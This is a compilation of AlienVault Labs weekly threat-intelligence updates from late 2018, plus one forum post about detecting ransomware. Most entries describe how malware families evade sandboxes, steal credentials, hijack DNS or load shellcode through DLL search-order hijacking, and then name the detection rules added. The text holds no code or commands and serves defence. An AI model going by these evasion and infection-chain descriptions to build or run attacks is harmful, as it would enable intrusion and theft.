    Additionally, the malware has anti-detection capabilities. First, it will not run if the system doesn't have enough resources, since it automatically assumes it is in a VM under forensic investigation. Second, if it detects certain antivirus software, it will try to turn them off, or only execute certain capabilities not detected by that antivirus.

    We've added NIDS signatures and updated the following correlation rule as a result of DarkGate activity:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques - PHPCMS 2008 (CVE-2018-19127)

    The Remote Code Execution vulnerability CVE-2018-19127 leverages a code injection vulnerability in /type.php in PHPCMS 2008. Attackers can send crafted requests to the vulnerable CMS. A lack of filtering in the source code allows all kinds of templates to go through and inject code into the system. Despite PHPCMS 2008 not being the latest version available, it is still a very common one.

    We've added NIDS signatures and updated the following correlation rule as a result of this activity:
    • Exploitation & Installation, Exploit, Code Execution

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Android/Agent.BAA, Android/Locker.PN, and Trojan-SMS.AndroidOS.Agent.uf:
    • System Compromise, Malware, Trojan Infection

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of recent malicious activity, including Android.Monitor.Puma:
    • System Compromise, Malware, Trojan Infection

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity, including phishing activity, CoinMiner, Kraken Ransomware, APT29, APT29 SSL Activity, OceanLotus, BR.Banker, and Banload Downloader:
    • Delivery & Attack, Malware Infection, Phishing
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: November 11 – November 17, 2018

    New Detection Techniques - Mylobot

    Mylobot is a highly versatile downloader, first reported in June by Deep Instinct security researchers. It also contains anti-sandboxing features: for example, it remains idle for 14 days after infection, after which it starts contacting the CnC server. Once active, it performs large volumes of DNS queries for a hardcoded list of 1404 domain names.

    The main locations targeted by this malware include the Middle East (Iraq, Iran and Saudi Arabia), East Asia (Vietnam and China), and Argentina.

    We've added NIDS signatures and the following correlation rule as a result of Mylobot activity:
    • System Compromise, Botnet infection, Mylobot
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bec53edbc977065131869ff

    New Detection Techniques - GhostDNS JS DNSChanger

    GhostDNS is a botnet infection spread through infected webpages. It is thought that this botnet has infected around 100,000 home router devices so far. It is unknown how long it has been active, but researchers estimate that the initial campaigns are one year old.

    The main module of GhostDNS is called DNSChanger, and its behaviour resembles the malware of the same name. It tries to change the DNS server settings on the infected device, allowing an attacker to redirect the user's traffic. DNSChanger includes three different modules, one of them written in JavaScript. It contains 10 different attack scripts designed to infect a total of 6 different router models.

    Once the DNS table is corrupted, user traffic is routed to phishing websites where victims might enter sensitive data such as credit card numbers.

    We've added NIDS signatures and the following correlation rule as a result of additional recent malicious activity:
    • System Compromise, Malicious website, GhostDNS JS DNSChanger
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bb33e3b1106f56a6ce44632

    New Detection Techniques - Urpage Stealer

    Urpage is the name of an unidentified threat actor which may have some connections to the Confucius, Patchwork, and Bahamut actors, according to TrendMicro security researchers. Samples share some links, domain names, and file hashes found on the CnC server.

    Urpage targets Android devices. The behaviour is similar to the Confucius and Patchwork stealers. It will try to install several Android applications, including one that looks like a fake Threema, an end-to-end encrypted messaging application. After installation, it starts to gather data, such as SMS messages, contact lists, audio recordings, GPS location, system files, and the MAC address. It may also install a backdoor module: a customized version of AndroRAT. The CnC traffic is base64 encoded.

    Surprisingly, the same infected web pages serving the Urpage payload for Android devices were found delivering samples of Windows malware.

    We've added NIDS signatures and the following correlation rule as a result of Urpage Stealer activity:
    • System Compromise, Trojan infection, Urpage Stealer
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b86c1af84048207fdac6338

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, JunkMiner Downloader
    • System Compromise, Trojan infection, Operation Baby
    • System Compromise, Trojan infection, Win32.Metamorfo.Banker
    • System Compromise, Trojan infection, Win32/Snowman
    • System Compromise, Trojan infection, Zyro FTP Stealer

    New Detection Techniques - Botnet Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Botnet infection, PhanapikalBot
    • System Compromise, Botnet infection, TeleGbot

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, PredatorTheThief SSL
    • System Compromise, C&C Communication, SocGholish SSL

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, Tenda Router Arbitrary Command Injection (CVE-2018-18728)
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, WordPress GDPR Plugin Privilege Escalation
    • Exploitation & Installation, Service Exploit, jQuery-File-Upload Unauthenticated File Upload with Suspicious Format
    • System Compromise, Malicious website, Hadoop RCE
    • System Compromise, Malware RAT, HuadhServHelper RAT
    • System Compromise, Mobile trojan infection, AndroidOS.Ramha.a

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, FIN7 Griffon
    • System Compromise, Trojan infection, JS/BrushaLoader CnC
    • System Compromise, Trojan infection, Kryptik
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, TinyNuke

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, PSEmpire SSL Activity
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Backdoor, Mocker
    • System Compromise, Botnet infection, ELF/Muhstik
    • System Compromise, Botnet infection, PhanapikalBot
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Mobile trojan infection, Android Rootnik-AI
    • System Compromise, Ransomware infection, Kraken Ransomware
    • System Compromise, Targeted Malware, APT32
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: November 11 – November 17, 2018

    New Detection Techniques - Mylobot

    Mylobot is a highly versatile downloader, first reported in June by Deep Instinct security researchers. It also contains anti-sandboxing features: for example, it remains idle for 14 days after infection, after which it starts contacting the CnC server. Once active, it performs large volumes of DNS queries for a hardcoded list of 1404 domain names.

    The main locations targeted by this malware include the Middle East (Iraq, Iran and Saudi Arabia), East Asia (Vietnam and China), and Argentina.

    We've added NIDS signatures and updated the following correlation rule as a result of Mylobot activity:
    • System Compromise, Malware Infection, Trojan
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bec53edbc977065131869ff

    New Detection Techniques - GhostDNS JS DNSChanger

    GhostDNS is a botnet infection spread through infected webpages. It is thought that this botnet has infected around 100,000 home router devices so far. It is unknown how long it has been active, but researchers estimate that the initial campaigns are one year old.

    The main module of GhostDNS is called DNSChanger, and its behaviour resembles the malware of the same name. It tries to change the DNS server settings on the infected device, allowing an attacker to redirect the user's traffic. DNSChanger includes three different modules, one of them written in JavaScript. It contains 10 different attack scripts designed to infect a total of 6 different router models. Once the DNS table is corrupted, user traffic is routed to phishing websites where victims might enter sensitive data such as credit card numbers.

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Exploit Kit, EK Payload Delivered
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5bb33e3b1106f56a6ce44632

    New Detection Techniques - Urpage Stealer

    Urpage is the name of an unidentified threat actor which may have some connections to the Confucius, Patchwork, and Bahamut actors, according to TrendMicro security researchers. Samples share some links, domain names, and file hashes found on the CnC server.

    Urpage targets Android devices. The behaviour is similar to the Confucius and Patchwork stealers. It will try to install several Android applications, including one that looks like a fake Threema, an end-to-end encrypted messaging application. After installation, it starts to gather data, such as SMS messages, contact lists, audio recordings, GPS location, system files, and the MAC address. It may also install a backdoor module: a customized version of AndroRAT. The CnC traffic is base64 encoded.

    Surprisingly, the same infected web pages serving the Urpage payload for Android devices were found delivering samples of Windows malware.

    We've added NIDS signatures and updated the following correlation rule as a result of Urpage Stealer activity:
    • System Compromise, Malware Infection, Trojan
    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5b86c1af84048207fdac6338

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including JunkMiner Downloader, Operation Baby, Urpage Stealer, Win32.Metamorfo.Banker, Win32/Snowman, and Zyro FTP Stealer activity:
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - Botnet Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent botnet infection activity, including Mylobot, PhanapikalBot, and TeleGbot:
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware Infection, Suspicious SSL Certificate

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • System Compromise, Exploit Kit, EK Payload Delivered
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Remote Access Trojan
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of recent malicious activity, including FIN7 Griffon, JS/BrushaLoader CnC, Kryptik, Obfuscated PowerShell Inbound, and TinyNuke:
    • System Compromise, Malware, Trojan

    Updated Detection Techniques - C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware Infection, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated our NIDS signatures and the following correlation rules as a result of recent malicious activity, including phishing activity, Mocker, ELF/Muhstik, PhanapikalBot, CoinMiner, Android Rootnik-AI, Kraken Ransomware, and APT32:
    • Delivery & Attack, Malware Infection, Phishing
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Ransomware
  • AlienVault Labs Threat Intelligence Update for USM Appliance: October 28 – November 3, 2018

    New Detection Techniques – Caesar

    Caesar is an HTTP-based Remote Access Trojan that allows the attacker to remotely control the victim's device directly from a browser, granting access from any type of device, even cell phones. The RAT is mainly intended for web servers. Additionally, due to being database driven, the attacker can queue tasks to be performed whenever the victim is online and check the results.

    We've added NIDS signatures and the following correlation rule to detect Caesar activity:
    • System Compromise, Malware RAT, py.caesarRAT

    New Detection Techniques – AZORult

    AZORult is a trojan that first steals financial information from the victim's computer and then installs ransomware on the system. The trojan has been seen used in malware campaigns targeting computers globally, usually propagating through phishing emails with an attached downloader. Once the downloader is executed, the malware downloads and executes two payloads. The first payload provides AZORult's primary functionality, which is stealing information from local accounts, browsers, saved credentials, etc. The second payload delivers ransomware, improving the attack's efficacy by switching malware family.

    We've added NIDS signatures and the following correlation rule to detect AZORult activity:
    • System Compromise, Trojan infection, AZORult SSL Activity

    New Detection Techniques – Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, EvilVNC Backdoor
    • System Compromise, Trojan infection, MSIL.WebBotnet.A
    • System Compromise, Trojan infection, MSIL/Agent.SWS
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Activity
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Response
    • System Compromise, Trojan infection, MSIL/Owned Bot
    • System Compromise, Trojan infection, MSIL/SCBP.Stealer
    • System Compromise, Trojan infection, MSIL/TPA02
    • System Compromise, Trojan infection, MSIL/Ubiquity Stealer
    • System Compromise, Trojan infection, Obfuscated PowerShell Inbound
    • System Compromise, Trojan infection, Qbot SSL Activity
    • System Compromise, Trojan infection, SuckLoader
    • System Compromise, Trojan infection, TrueBot/Silence.Downloader
    • System Compromise, Trojan infection, VBS/Agent.Y
    • System Compromise, Trojan infection, W32.YBomeMiner
    • System Compromise, Trojan infection, Win32/Agent.QP

    New Detection Techniques – Remote Access Tools

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, RizzoRAT SSL Activity
    • System Compromise, Malware RAT, njRAT SSL Activity

    New Detection Techniques – Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/GPlayed
    • System Compromise, Mobile trojan infection, Android/GoldenTouch.A!tr
    • System Compromise, Mobile trojan infection, Trojan-Spy.AndroidOS.SmForw.ar

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, D-Link DIR-816 A2 RCE
    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, DuomiCMS RCE (CVE-2018-18083)
    • System Compromise, Ransomware infection, Trojan-Ransom.AndroidOS.Congur.y

    Updated Detection Techniques – Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Trojan infection, AZORult
    • System Compromise, Trojan infection, Banload Downloader
    • System Compromise, Trojan infection, FlyStudio
    • System Compromise, Trojan infection, MSIL/IRCBot
    • System Compromise, Trojan infection, MSIL/KeyRedirEx CnC Response
    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, TScookie
    • System Compromise, Trojan infection, Unknown PowerShell
    • System Compromise, Trojan infection, Zebrocy

    Updated Detection Techniques – Remote Access Tools

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques – Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • System Compromise, Mobile trojan infection, Android/TrojanDropper.Agent.BL

    Updated Detection Techniques – C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:
    • System Compromise, C&C Communication, Gootkit SSL activity
    • System Compromise, C&C Communication, MalDoc
    • System Compromise, C&C Communication, Malicious SSL Cert (CobInt Downloader)
    • System Compromise, C&C Communication, Malicious SSL Cert (sLoad)
    • System Compromise, C&C Communication, Ursnif SSL activity

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of additional recent malicious activity:
    • Delivery & Attack, Malicious website, Phishing activity
    • System Compromise, Malicious website - Exploit Kit, GreenFlash Sundown EK
    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Malware infection, Ursnif
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: October 28 – November 3, 2018

    New Detection Techniques – Caesar

    Caesar is an HTTP-based Remote Access Trojan that allows the attacker to remotely control the victim's device directly from a browser, granting access from any type of device, even cell phones. The RAT is mainly intended for web servers. Additionally, due to being database driven, the attacker can queue tasks to be performed whenever the victim is online and check the results.

    We've added NIDS signatures and updated the following correlation rule to detect Caesar activity:
    • System Compromise, Malware, Remote Access Trojan

    New Detection Techniques – AZORult

    AZORult is a trojan that first steals financial information from the victim's computer and then installs ransomware on the system. The trojan has been seen used in malware campaigns targeting computers globally, usually propagating through phishing emails with an attached downloader. Once the downloader is executed, the malware downloads and executes two payloads. The first payload provides AZORult's primary functionality, which is stealing information from local accounts, browsers, saved credentials, etc. The second payload delivers ransomware, improving the attack's efficacy by switching malware family.

    We've added NIDS signatures and updated the following correlation rule to detect AZORult activity:
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques – Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including EvilVNC Backdoor, MSIL.WebBotnet.A, MSIL/Agent.SWS, MSIL/KeyRedirEx CnC Activity, MSIL/KeyRedirEx CnC Response, MSIL/Owned Bot, MSIL/SCBP.Stealer, MSIL/TPA02, MSIL/Ubiquity Stealer, Obfuscated PowerShell Inbound, Qbot SSL Activity, SuckLoader, TrueBot/Silence.Downloader, VBS/Agent.Y, W32.YBomeMiner, and Win32/Agent.QP:
    • System Compromise, Malware, Trojan

    New Detection Techniques – Remote Access Tools

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including RizzoRAT SSL Activity and njRAT SSL Activity:
    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware, Suspicious SSL Certificate

    New Detection Techniques – Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including GPlayed, GoldenTouch.A!tr, and Trojan-Spy.AndroidOS.SmForw.ar:
    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Spyware

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity:
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of recent malicious activity, including AZORult, Banload Downloader, FlyStudio, MSIL/IRCBot, MSIL/KeyRedirEx CnC Response, MalDoc, TScookie, Zebrocy, and additional PowerShell activity:
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – Remote Access Tools

    We've updated NIDS signatures and the following correlation rule as a result of recent malicious activity, including Remcos/Remvio:
    • System Compromise, Malware Infection, Remote Access Trojan

    Updated Detection Techniques – Mobile Trojan Infection

    We've updated NIDS signatures and the following correlation rule as a result of recent malicious activity, including Android/TrojanDropper.Agent.BL:
    • System Compromise, Malware, Trojan

    Updated Detection Techniques – C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:
    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Detection Techniques

    We've updated NIDS signatures and the following correlation rules as a result of recent malicious activity, including the GreenFlash Sundown exploit kit, CoinMiner, Ursnif, and phishing activity:
    • Delivery & Attack, Suspicious Activity, Phishing
    • Exploitation & Installation, Exploit, Code Execution
    • System Compromise, Malware, Trojan
  • Ransomware directives
    kcoe's answer is non-responsive to the question. The OP asked about a method of identifying an active ransomware event that has evaded the AV and it is still relevant and some guidance from AlienWare would be appreciated. 
    My org experienced a zero-day ransomware event where none of the VirusTotal detectors had seen the attack prior to us - how do I minimize the damage if my SIEM can't let me know about abnormal file modifications?
    Can someone PLEASE provide some guidance on this?
  • AlienVault Labs Threat Intelligence Update for USM Appliance: October 14 – October 20, 2018

    New Detection Techniques - Xor.DDoS

    Xor.DDoS is a DDoS bot targeting the Linux platform which has been active since 2015. The name Xor.DDoS stems from the heavy use of XOR encryption in both the malware itself and its network communication with the C&Cs. The Xor.DDoS bot differentiates itself from other DDoS bots by using a custom loadable kernel module (LKM) for rootkit functionality. The rootkit component in Xor.DDoS is said to be based on the open-source Suterusu rootkit, and its main purpose is to hide network communications.

    We've added NIDS signatures and the following correlation rule to detect Xor.DDoS:

    • System Compromise, Trojan infection, ELF/Chacha.DDoS/Xor.DDoS

    New Detection Techniques - Hidden Mellifera/Hidden Bee

    Hidden Bee is a complex Coinmining bootkit that is known to be distributed by the Underminer Exploit Kit, amongst others. The Hidden Bee mining component is distributed in a custom executable format rather than in a regular PE file, which gets dropped after multiple stages. For network communications, Hidden Bee uses both HTTP and encrypted TCP.

    As for persistence, Hidden Bee alters the MBR so the miner is started every time the operating system boots.

    We've added NIDS signatures and the following correlation rule to detect Hidden Bee:
    • System Compromise, Trojan infection, Hidden Mellifera Bee

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Trojan-Clicker.AndroidOS.Ubsod.b
    • System Compromise, Mobile trojan infection, Android.Trojan.SpyCall
    • System Compromise, Mobile trojan infection, Trojan.AndroidOS.Banker.GPlayed

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, json Client Exfil
    • System Compromise, Trojan infection, XLS.Unk DDE

    New Detection Techniques

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • Exploitation & Installation, Client Side Exploit - Known Vulnerability, CMCMS WebShell (CVE-2018-17126)
    • System Compromise, Backdoor, DeadlyEagle
    • System Compromise, C&C Communication, Gadwats

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Trojan infection, Gootkit
    • System Compromise, Trojan infection, MSIL/CoalaBot
    • System Compromise, Trojan infection, QwertMiner
    • System Compromise, Trojan infection, MalDoc
    • System Compromise, Trojan infection, Fuerboos
    • System Compromise, Malware RAT, NavRAT
    • System Compromise, Trojan infection, XLS.Unk DDE
    • System Compromise, Trojan infection, Unknown trojan
    • System Compromise, Malware RAT, DarkComet
    • System Compromise, Trojan infection, Linux DDoS Bot
    • System Compromise, Malware RAT, Remcos/Remvio

    Updated Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Mobile trojan infection, Android APT-C-23
    • System Compromise, Mobile trojan infection, Asacub.a Banker

    Updated Detection Technique – C&C Communication

    We've updated our IDS signatures to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities. The updated correlation rules use this information to detect command and control (C&C) communications related to several malware families, including:

    • System Compromise, C&C Communication, Known malicious SSL certificate
    • System Compromise, C&C Communication, Ursnif SSL activity
    • System Compromise, C&C Communication, Observed Malicious SSL Cert (MalDoc DL) SSL activity
    • System Compromise, C&C Communication, Zeus Panda SSL Certificate
    • System Compromise, C&C Communication, Cobalt Group
    • System Compromise, C&C Communication, Cobalt Group SSL
    • System Compromise, C&C Communication, MalDoc

    Updated Correlation Rules

    We've added NIDS signatures and updated the following correlation rules as a result of additional recent malicious activity:

    • System Compromise, Malware infection, CoinMiner
    • System Compromise, Ransomware infection, Locky
    • System Compromise, Ransomware infection, GoldenEye
    • System Compromise, Backdoor, DeadlyEagle
    • Delivery & Attack, Malicious website - Exploit Kit, Malicious redirection
    • Delivery & Attack, Malicious website, Phishing activity
  • AlienVault Labs Threat Intelligence Update for USM Anywhere: October 14 – October 20, 2018

    New Detection Techniques - Xor.DDoS

    Xor.DDoS is a DDoS bot targeting the Linux platform which has been active since 2015. The name Xor.DDoS stems from the heavy use of XOR encryption in both the malware itself and its network communication with the C&Cs. The Xor.DDoS bot differentiates itself from other DDoS bots by using a custom loadable kernel module (LKM) for rootkit functionality. The rootkit component in Xor.DDoS is said to be based on the open-source Suterusu rootkit, and its main purpose is to hide network communications.

    We've added NIDS signatures and the following correlation rule to detect Xor.DDoS:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Hidden Mellifera/Hidden Bee

    Hidden Bee is a complex Coinmining bootkit that is known to be distributed by the Underminer Exploit Kit, amongst others. The Hidden Bee mining component is distributed in a custom executable format rather than in a regular PE file, which gets dropped after multiple stages. For network communications, Hidden Bee uses both HTTP and encrypted TCP.

    As for persistence, Hidden Bee alters the MBR so the miner is started every time the operating system boots.

    We've added NIDS signatures and the following correlation rule to detect Hidden Bee:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rule as a result of recent malicious activity, including Trojan.AndroidOS.Banker.GPlayed and Trojan-Clicker.AndroidOS.Ubsod.b:

    • System Compromise, Malware, Trojan

    New Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Xor.DDoS and Hidden Mellifera/Hidden Bee:

    • System Compromise, Malware, Trojan

    New Detection Techniques

    We've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including DeadlyEagle and Gadwats:

    • Delivery & Attack, Exploit, Webshell
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Remcos/Remvio, Gootkit, MSIL/CoalaBot, Fuerboos, NavRAT, and DarkComet:

    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    We've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Android APT-C-23 and Asacub.a Banker:

    • System Compromise, Malware Infection, APT
    • System Compromise, Malware, Trojan

    Updated Detection Technique – C&C Communication

    We've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    We've added NIDS signatures and the following correlation rules to detect additional recent malicious activity, including CoinMiner, Locky, GoldenEye, DeadlyEagle, and various phishing activity:

    • System Compromise, Malware Infection, Ransomware
    • System Compromise, Malware Infection, Trojan
    • System Compromise, Malware Infection, Backdoor
    • Delivery & Attack, Malware, Exploit Kit - Redirection
    • Delivery & Attack, Suspicious Activity, Phishing

  • AlienVault Labs Threat Intelligence Update for USM Anywhere: September 23 – September 29, 2018

    New Detection Techniques - VBscript UAF (CVE-2018-8373)

    CVE-2018-8373 is a remote code execution vulnerability in the way the VBScript scripting engine handles objects in memory (a use-after-free). When a VBScript runs commands through Shell.Application or WScript.Shell, the engine decides whether to allow the call by checking its SafeMode flag; if the flag does not indicate safe mode, the shellcode executes. On the latest Internet Explorer version the script does not run, even without the patch, because the SafeMode flag is located at a different position in memory.

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect the VBScript UAF Exploit:

    • Exploitation & Installation, Exploit, Code Execution

    Related content in Open Threat Exchange: https://otx.alienvault.com/indicator/cve/CVE-2018-8373

    New Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including Android/Ceshi.Stealer and Android/FakeDefender.

    • System Compromise, Malware, Trojan

    New Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules as a result of recent malicious activity, including MSIL.Xpctra RAT, MSIL/AcouKitty Stealer, MS_D0wnl0ad3r, VBS/Frauder, Viro, and WebSearchy Browser Hijack:

    • System Compromise, Malware Infection, Remote Access Trojan
    • System Compromise, Malware Infection, Trojan

    New Detection Techniques

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including MalDoc, N40, and JS/Soakinj:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Ransomware
    • System Compromise, Malware, Suspicious SSL Certificate
    • Exploitation & Installation, Exploit, Vulnerability Scanner
    • Exploitation & Installation, Exploit, Code Execution

    Updated Detection Techniques - Android APT-C-23

    This has been the third consecutive week of heavy activity by the Android APT-C-23 group, which mainly targets victims in the Middle East. The main reason is the large number of domains (hundreds) registered by the group that are still being discovered and attributed to them. The main infection vector was fake updates to legitimate Android applications, delivered either by phishing SMS or by uploading the malware to third-party stores (and, at first, even Google Play). Through Firebase Cloud Messaging (FCM) or SMS, the attackers could communicate with the C&C and send instructions to the malware. On top of the C&C communication, the malware was capable of many malicious activities, such as uploading or encrypting files, file management, recording, and installing or uninstalling other apps.

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity:

    • System Compromise, Malware, APT

    Related content in Open Threat Exchange: https://otx.alienvault.com/pulse/5ba136c3555f0f6a740209ae

    Updated Detection Techniques - Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Quasar, Remcos, CoinMiner, Ursnif, KPOT, MalDoc, DanaBot and ZeroEvil:

    • System Compromise, Malware, Trojan
    • System Compromise, Malware, Remote Access Trojan

    Updated Detection Techniques - Mobile Trojan Infection

    For USM Anywhere, we've added NIDS signatures and updated the following correlation rules to detect additional recent malicious activity, including Asacub.a Banker and Trojan.AndroidOS.Handda.

    • System Compromise, Malware, Trojan

    Updated Detection Technique – C&C Communication

    For USM Anywhere, we've updated our IDS signatures and the following correlation rule to include the list of certificates identified by Abuse.ch to be associated with malware or botnet activities:

    • System Compromise, Malware, Suspicious SSL Certificate

    Updated Correlation Rules

    For USM Anywhere, we've added NIDS signatures and the following correlation rules to detect additional recent malicious activity, including phishing activity, bruteforce activity, and an exploit through VBScript:

    • Exploitation & Installation, Exploit, Code Execution
    • Delivery & Attack, Suspicious Activity, Phishing
    • Delivery & Attack, Attack, Bruteforce
  • AlienVault Labs Threat Intelligence Update for USM Appliance: September 16 – September 22, 2018

    New Detection Techniques - UPPERCUT backdoor

    The UPPERCUT backdoor, also called ANEL, is a backdoor used by the group APT10 in a recent campaign targeting the Japanese media sector. The backdoor is distributed via Macro-enabled Word documents with a traditional lure. The malicious document drops 3 files which then get decoded by certutil.exe. The dropped files are:

    1. GUP.exe: GUP, a legitimate open-source generic updater
    2. libcurl.dll: Malicious Loader DLL
    3. 3F2E3AB9: Encrypted shellcode

    The malicious document then executes the dropped GUP.exe, which loads the malicious libcurl.dll instead of the legitimate one (via DLL search order hijacking). Once loaded, the malicious DLL will load, decrypt, and execute the encrypted shellcode contained in the third file. The encrypted shellcode will then decompress and execute another embedded DLL. This latter DLL is the final stage payload.

